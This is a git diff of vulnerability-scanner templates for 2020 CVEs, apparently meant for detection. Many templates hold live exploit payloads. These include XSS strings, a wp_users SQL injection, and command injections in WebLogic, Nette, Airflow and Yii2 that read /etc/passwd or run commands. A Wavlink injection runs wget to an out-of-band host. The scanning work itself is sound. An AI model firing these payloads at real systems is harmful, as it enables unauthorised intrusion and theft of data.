+ Originated from Metasploit module (#14654).
+ tags: cve,cve2020,ucmdb,rce
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/ucmdb-api/connect"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "HttpUcmdbServiceProviderFactoryImpl"
+ - "ServerVersion=11.6.0"
+ part: body
+ condition: and
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-11930.yaml b/cves/2020/CVE-2020-11930.yaml
new file mode 100644
index 0000000000..bb9b865da6
--- /dev/null
+++ b/cves/2020/CVE-2020-11930.yaml
@@ -0,0 +1,31 @@
+id: CVE-2020-11930
+
+info:
+ name: WordPress Plugin "Translate WordPress with GTranslate" (gtranslate) XSS
+ author: dhiyaneshDK
+ severity: medium
+ description: |
+ The GTranslate plugin before 2.8.52 for WordPress was vulnerable to an Unauthenticated Reflected XSS vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option.
+ reference: |
+ - https://wpscan.com/vulnerability/10181
+ - https://payatu.com/blog/gaurav/analysis-of-cve-2020-11930:-reflected-xss-in-gtranslate-wordpress-module
+ tags: cve,cve2020,wordpress,xss
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/does_not_exist"%22%3E%3Cscript%3Ealert("XSS")%3C/script%3E alert("XSS")'
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2020/CVE-2020-11978.yaml b/cves/2020/CVE-2020-11978.yaml
new file mode 100644
index 0000000000..0b7751f18a
--- /dev/null
+++ b/cves/2020/CVE-2020-11978.yaml
@@ -0,0 +1,64 @@
+id: CVE-2020-11978
+info:
+ name: Apache Airflow <= 1.10.10 - 'Example Dag' Remote Code Execution
+ author: pdteam
+ severity: high
+ description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.
+ reference: |
+ - https://github.com/pberba/CVE-2020-11978
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-11978
+ - https://twitter.com/wugeej/status/1400336603604668418
+ tags: cve,cve2020,apache,airflow,rce
+
+requests:
+ - raw:
+ - |
+ GET /api/experimental/test HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+
+ - |
+ GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+
+ - |
+ POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Content-Length: 85
+ Content-Type: application/json
+
+ {"conf": {"message": "\"; touch test #"}}
+
+ - |
+ GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+
+
+ extractors:
+ - type: regex
+ name: exec_date
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - '"execution_date":"([0-9-A-Z:+]+)"'
+
+ req-condition: true
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body_4, "operator":"BashOperator")'
+ - 'contains(all_headers_4, "application/json")'
+ condition: and
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-11991.yaml b/cves/2020/CVE-2020-11991.yaml
index 87f11c5733..18f07c95ee 100644
--- a/cves/2020/CVE-2020-11991.yaml
+++ b/cves/2020/CVE-2020-11991.yaml
@@ -4,7 +4,10 @@ info:
name: Apache Cocoon 2.1.12 XML Injection
author: pikpikcu
severity: high
- reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11991
+ tags: cve,cve2020,apache,xml,cocoon
+ description: |
+ When using the StreamGenerator, the code parse a user-provided XML. A specially crafted XML, including external system entities, could be used to access any file on the server system.
+ reference: https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E
requests:
- method: POST
@@ -25,7 +28,7 @@ requests:
- type: regex
regex:
- - "root:[x*]:0:0"
+ - "root:.*:0:0"
- type: status
status:
diff --git a/cves/2020/CVE-2020-12054.yaml b/cves/2020/CVE-2020-12054.yaml
new file mode 100644
index 0000000000..60bcb223fb
--- /dev/null
+++ b/cves/2020/CVE-2020-12054.yaml
@@ -0,0 +1,32 @@
+id: CVE-2020-12054
+
+info:
+ name: Catch Breadcrumb < 1.5.7 - Unauthenticated Reflected XSS
+ author: daffainfo
+ severity: medium
+ description: The Catch Breadcrumb plugin before 1.5.4 for WordPress allows Reflected XSS via the s parameter (a search query).
+ reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
+ tags: cve,cve2020,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - " "
+ - "catch-breadcrumb"
+ part: body
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-12116.yaml b/cves/2020/CVE-2020-12116.yaml
index 80f6378499..32023cb990 100644
--- a/cves/2020/CVE-2020-12116.yaml
+++ b/cves/2020/CVE-2020-12116.yaml
@@ -5,10 +5,8 @@ info:
author: dwisiswant0
severity: high
description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request.
- tags: cve,cve2020,zoho,traversal
-
- # References:
- # - https://github.com/BeetleChunks/CVE-2020-12116
+ tags: cve,cve2020,zoho,lfi
+ reference: https://github.com/BeetleChunks/CVE-2020-12116
requests:
- raw:
@@ -34,8 +32,10 @@ requests:
regex:
- "(?m)/cachestart/.*/jquery/"
+ req-condition: true
matchers:
- - type: word
- words:
- - "BEGIN RSA PRIVATE KEY"
- part: body
\ No newline at end of file
+ - type: dsl
+ dsl:
+ - 'contains(body_2, "BEGIN RSA PRIVATE KEY")'
+ - 'status_code_2 == 200'
+ condition: and
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-12720.yaml b/cves/2020/CVE-2020-12720.yaml
index 49c158ee62..cf0dc3791a 100644
--- a/cves/2020/CVE-2020-12720.yaml
+++ b/cves/2020/CVE-2020-12720.yaml
@@ -2,7 +2,7 @@ id: CVE-2020-12720
info:
name: CVE-2020-12720 vBulletin SQLI
- author: pdnuclei - projectdiscovery.io
+ author: pdteam
severity: critical
description: vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control.
reference: https://github.com/rekter0/exploits/tree/master/CVE-2020-12720
diff --git a/cves/2020/CVE-2020-13117.yaml b/cves/2020/CVE-2020-13117.yaml
new file mode 100644
index 0000000000..158a9a0af5
--- /dev/null
+++ b/cves/2020/CVE-2020-13117.yaml
@@ -0,0 +1,31 @@
+id: CVE-2020-13117
+
+info:
+ name: Wavlink Multiple AP - Unauthenticated RCE
+ author: gy741
+ severity: critical
+ description: Several Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may be affected.
+ reference:
+ - https://blog.0xlabs.com/2021/02/wavlink-rce-CVE-2020-13117.html
+ tags: cve,cve2020,wavlink,rce,oob
+
+requests:
+ - raw:
+ - |
+ POST /cgi-bin/login.cgi HTTP/1.1
+ Host: {{Hostname}}
+ Cache-Control: max-age=0
+ Upgrade-Insecure-Requests: 1
+ Origin: http://{{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ Accept-Encoding: gzip, deflate
+ Connection: close
+
+ newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
diff --git a/cves/2020/CVE-2020-13167.yaml b/cves/2020/CVE-2020-13167.yaml
index 6c8663dabb..a3e209364d 100644
--- a/cves/2020/CVE-2020-13167.yaml
+++ b/cves/2020/CVE-2020-13167.yaml
@@ -6,6 +6,9 @@ info:
severity: critical
description: Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters.
tags: cve,cve2020,netsweeper,rce
+ reference: |
+ - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
+ - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
# This template exploits a Python code injection in the Netsweeper
# WebAdmin component's unixlogin.php script, for versions 6.4.4 and
@@ -18,10 +21,6 @@ info:
# Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
# been confirmed exploitable.
- # References:
- # - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
- # - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
-
requests:
- method: GET
path:
diff --git a/cves/2020/CVE-2020-13483.yaml b/cves/2020/CVE-2020-13483.yaml
new file mode 100644
index 0000000000..93175bfeeb
--- /dev/null
+++ b/cves/2020/CVE-2020-13483.yaml
@@ -0,0 +1,31 @@
+id: CVE-2020-13483
+
+info:
+ name: Bitrix24 through 20.0.0 allows XSS
+ author: pikpikcu
+ severity: high
+ reference: https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558
+ description: The Web Application Firewall in Bitrix24 through 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI.
+ tags: cve,cve2020,xss,bitrix
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E'
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - "function(handler){};function __MobileAppList(test){alert(document.domain);};//"
+ part: body
+
+ - type: word
+ words:
+ - text/html
+ part: header
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2020/CVE-2020-13700.yaml b/cves/2020/CVE-2020-13700.yaml
new file mode 100644
index 0000000000..645363a779
--- /dev/null
+++ b/cves/2020/CVE-2020-13700.yaml
@@ -0,0 +1,35 @@
+id: CVE-2020-13700
+
+info:
+ name: acf-to-rest-api wordpress plugin IDOR
+ author: pikpikcu
+ severity: high
+ reference: https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5
+ description: |
+ An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress.
+ It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a
+ wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values.
+ tags: cve,cve2020,wordpress
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-json/acf/v3/options/a?id=active&field=plugins'
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - 'Content-Type: application/json'
+ part: header
+
+ - type: word
+ words:
+ - 'acf-to-rest-api\/class-acf-to-rest-api.php'
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2020/CVE-2020-13927.yaml b/cves/2020/CVE-2020-13927.yaml
new file mode 100644
index 0000000000..4d8a08fa63
--- /dev/null
+++ b/cves/2020/CVE-2020-13927.yaml
@@ -0,0 +1,20 @@
+id: CVE-2020-13927
+
+info:
+ name: Unauthenticated Airflow Experimental REST API
+ author: pdteam
+ severity: critical
+ tags: cve,cve2020,apache,airflow,unauth
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/api/experimental/latest_runs'
+
+ matchers:
+ - type: word
+ words:
+ - '"dag_run_url":'
+ - '"dag_id":'
+ - '"items":'
+ condition: and
diff --git a/cves/2020/CVE-2020-13937.yaml b/cves/2020/CVE-2020-13937.yaml
index dc69730ad9..a9a57c35b7 100644
--- a/cves/2020/CVE-2020-13937.yaml
+++ b/cves/2020/CVE-2020-13937.yaml
@@ -11,12 +11,11 @@ info:
3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed
Kylin's configuration information without any authentication,
so it is dangerous because some confidential information entries will be disclosed to everyone.
- reference: ttps://nvd.nist.gov/vuln/detail/CVE-2020-13937
+ reference: |
+ - https://kylin.apache.org/docs/release_notes.html
+ - https://s.tencent.com/research/bsafe/1156.html
tags: cve,cve2020,apache
- # References:
- # https://s.tencent.com/research/bsafe/1156.html
-
requests:
- method: GET
path:
@@ -29,13 +28,15 @@ requests:
- type: status
status:
- 200
+
- type: word
words:
- "application/json"
- condition: and
part: header
+
- type: word
words:
- - "config"
+ - config
+ - kylin.metadata.url
condition: and
part: body
diff --git a/cves/2020/CVE-2020-13942.yaml b/cves/2020/CVE-2020-13942.yaml
index 2c178165b6..3d17f4d3c9 100644
--- a/cves/2020/CVE-2020-13942.yaml
+++ b/cves/2020/CVE-2020-13942.yaml
@@ -11,7 +11,7 @@ info:
that could execute code with the permission level of the running Java process.
This vulnerability affects all versions of Apache Unomi prior to 1.5.2. Apache Unomi users should upgrade to 1.5.2 or later.
- References:
+ reference: |
- https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/
- https://twitter.com/chybeta/status/1328912309440311297
tags: cve,cve2020,apache,rce
diff --git a/cves/2020/CVE-2020-14092.yaml b/cves/2020/CVE-2020-14092.yaml
new file mode 100644
index 0000000000..d23c7a5782
--- /dev/null
+++ b/cves/2020/CVE-2020-14092.yaml
@@ -0,0 +1,33 @@
+id: CVE-2020-14092
+
+info:
+ name: WordPress Payment Form For Paypal Pro Unauthenticated SQL Injection
+ author: princechaddha
+ severity: critical
+ description: WordPress Payment Form For Paypal Pro 'query' parameter allows for any unauthenticated user to perform SQL queries with result output to a web page in JSON format.
+ reference: https://wpscan.com/vulnerability/10287
+ tags: cve,cve2020,wordpress,wp-plugin,sqli
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "text/html"
+ part: header
+ - type: word
+ words:
+ - '"user_login"'
+ - '"user_email"'
+ - '"user_pass"'
+ - '"user_activation_key"'
+ condition: and
+ part: body
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-14179.yaml b/cves/2020/CVE-2020-14179.yaml
index 21c0ab5bdc..116f824ef7 100644
--- a/cves/2020/CVE-2020-14179.yaml
+++ b/cves/2020/CVE-2020-14179.yaml
@@ -5,7 +5,7 @@ info:
author: x1m_martijn
severity: medium
description: Affected versions of Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint. The affected versions are before version 8.5.8, and from version 8.6.0 before 8.11.1.
- reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14179
+ reference: https://jira.atlassian.com/browse/JRASERVER-71536
tags: cve,cve2020,atlassian,jira
requests:
diff --git a/cves/2020/CVE-2020-14181.yaml b/cves/2020/CVE-2020-14181.yaml
index 893f14671b..5f17e0a7bf 100644
--- a/cves/2020/CVE-2020-14181.yaml
+++ b/cves/2020/CVE-2020-14181.yaml
@@ -5,13 +5,11 @@ info:
author: bjhulst
severity: medium
description: Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint. The affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0.
- reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14181
+ reference: |
+ - https://jira.atlassian.com/browse/JRASERVER-71560
+ - http://packetstormsecurity.com/files/161730/Atlassian-JIRA-8.11.1-User-Enumeration.html
tags: cve,cve2020,atlassian,jira
-# This template supports the detection part only.
-# Do not test any website without permission
-# Do not report without having working poc.
-
requests:
- method: GET
path:
diff --git a/cves/2020/CVE-2020-14413.yaml b/cves/2020/CVE-2020-14413.yaml
new file mode 100644
index 0000000000..5cbe2e48a3
--- /dev/null
+++ b/cves/2020/CVE-2020-14413.yaml
@@ -0,0 +1,31 @@
+id: CVE-2020-14413
+
+info:
+ name: NeDi 1.9C XSS
+ author: pikpikcu
+ severity: medium
+ reference: https://gist.github.com/farid007/8db2ab5367ba00e87f9479b32d46fea8
+ description: NeDi 1.9C is vulnerable to XSS because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value.
+ tags: cve,cve2020,nedi,xss
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E'
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - " "
+ part: body
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-14815.yaml b/cves/2020/CVE-2020-14815.yaml
deleted file mode 100644
index e8b590b0f3..0000000000
--- a/cves/2020/CVE-2020-14815.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: CVE-2020-14815
-
-info:
- name: Oracle Business Intelligence XSS
- author: pikpikcu
- severity: medium
- reference: https://www.oracle.com/security-alerts/cpuoct2020.html
- tags: cve,cve2020,oracle,xss
-
- # https://twitter.com/HackerOn2Wheels/status/1326927875279380480
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/bi-security-login/login.jsp?msi=false&redirect=%22%3E%3Cimg/src/onerror%3dalert(document.domain)%3E"
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - "X-Oracle-Dms-Ecid:"
- - "X-Oracle-Dms-Rid:"
- part: header
diff --git a/cves/2020/CVE-2020-14864.yaml b/cves/2020/CVE-2020-14864.yaml
index a84e8c8bf2..edd398ebf6 100644
--- a/cves/2020/CVE-2020-14864.yaml
+++ b/cves/2020/CVE-2020-14864.yaml
@@ -5,12 +5,13 @@ info:
author: Ivo Palazzolo (@palaziv)
cvss: 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'
severity: high
- tags: cve,cve2020,oracle,traversal
+ tags: cve,cve2020,oracle,lfi
+ reference: |
+ - http://packetstormsecurity.com/files/159748/Oracle-Business-Intelligence-Enterprise-Edition-5.5.0.0.0-12.2.1.3.0-12.2.1.4.0-LFI.html
+ - https://www.oracle.com/security-alerts/cpuoct2020.html
requests:
- method: GET
- headers:
- User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
path:
- '{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1' # grab autologin cookies
- '{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd'
@@ -22,5 +23,5 @@ requests:
- 200
- type: regex
regex:
- - 'root:[x*]:0:0'
+ - 'root:.*:0:0'
part: body
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-14882.yaml b/cves/2020/CVE-2020-14882.yaml
index 51b8f4192e..4c2e370aa0 100644
--- a/cves/2020/CVE-2020-14882.yaml
+++ b/cves/2020/CVE-2020-14882.yaml
@@ -4,7 +4,11 @@ info:
name: Oracle WebLogic Server Unauthenticated RCE (and Patch Bypass)
author: dwisiswant0
severity: critical
- reference: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
+ reference: |
+ - https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
+ - https://twitter.com/jas502n/status/1321416053050667009
+ - https://youtu.be/JFVDOIL0YtA
+ - https://github.com/jas502n/CVE-2020-14882#eg
description: |
Vulnerability in the Oracle WebLogic Server
product of Oracle Fusion Middleware (component: Console).
@@ -15,11 +19,6 @@ info:
Successful attacks of this vulnerability can result in takeover.
tags: cve,cve2020,oracle,rce,weblogic
- # References:
- # - https://twitter.com/jas502n/status/1321416053050667009
- # - https://youtu.be/JFVDOIL0YtA
- # - https://github.com/jas502n/CVE-2020-14882#eg
-
requests:
- payloads:
exec:
@@ -38,7 +37,7 @@ requests:
matchers:
- type: regex
regex:
- - "root:[x*]:0:0:"
+ - "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
part: body
diff --git a/cves/2020/CVE-2020-14883.yaml b/cves/2020/CVE-2020-14883.yaml
new file mode 100644
index 0000000000..dbb81a9dd2
--- /dev/null
+++ b/cves/2020/CVE-2020-14883.yaml
@@ -0,0 +1,32 @@
+id: CVE-2020-14883
+
+info:
+ name: Oracle WebLogic Server Administration Console Handle RCE
+ author: pdteam
+ severity: critical
+ description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
+ reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883
+ tags: cve,cve2020,oracle,rce,weblogic
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/console/images/%252e%252e%252fconsole.portal"
+ headers:
+ Content-Type: application/x-www-form-urlencoded
+ Test-Header: cat /etc/passwd
+
+ body: |
+ test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("Test-Header");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2020/CVE-2020-15148.yaml b/cves/2020/CVE-2020-15148.yaml
new file mode 100644
index 0000000000..a9e3680ead
--- /dev/null
+++ b/cves/2020/CVE-2020-15148.yaml
@@ -0,0 +1,27 @@
+id: CVE-2020-15148
+
+info:
+ name: Yii 2 (yiisoft/yii2) RCE
+ author: pikpikcu
+ severity: high
+ reference: |
+ - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943
+ - https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md
+ tags: cve,cve2020,rce,yii
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ=="
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "total"
+ - "internal server error"
+ condition: and
+
+ - type: status
+ status:
+ - 500
diff --git a/cves/2020/CVE-2020-15227.yaml b/cves/2020/CVE-2020-15227.yaml
new file mode 100644
index 0000000000..75ab77e69a
--- /dev/null
+++ b/cves/2020/CVE-2020-15227.yaml
@@ -0,0 +1,29 @@
+id: CVE-2020-15227
+
+info:
+ name: Nette Framework RCE
+ author: becivells
+ severity: high
+ description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework.
+ reference: |
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-15227
+ - https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94
+ - https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E#
+ - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md
+ tags: cve,cve2020,nette,rce
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2020/CVE-2020-15500.yaml b/cves/2020/CVE-2020-15500.yaml
new file mode 100644
index 0000000000..21b2119cba
--- /dev/null
+++ b/cves/2020/CVE-2020-15500.yaml
@@ -0,0 +1,30 @@
+id: CVE-2020-15500
+
+info:
+ name: TileServer GL Reflected XSS
+ author: Akash.C
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2020-15500
+ source: https://github.com/maptiler/tileserver-gl/issues/461
+ tags: cve,cve2020,xss,tileserver
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: word
+ words:
+ - "'>\""
+ part: body
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-15505.yaml b/cves/2020/CVE-2020-15505.yaml
index 4944ec1a32..45205e7076 100644
--- a/cves/2020/CVE-2020-15505.yaml
+++ b/cves/2020/CVE-2020-15505.yaml
@@ -4,14 +4,19 @@ info:
name: RCE in MobileIron Core & Connector <= v10.6 & Sentry <= v9.8
author: dwisiswant0
severity: critical
- reference: https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
+ description: |
+ A remote code execution vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; and Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier that allows remote attackers to execute arbitrary code via unspecified vectors.
+ reference: |
+ - https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
+ - https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505
+ - https://github.com/iamnoooob/CVE-Reverse/blob/master/CVE-2020-15505/hessian.py#L10
+ - https://github.com/orangetw/JNDI-Injection-Bypass
tags: cve,cve2020,mobileiron,rce
# THIS TEMPLATE IS ONLY FOR DETECTING
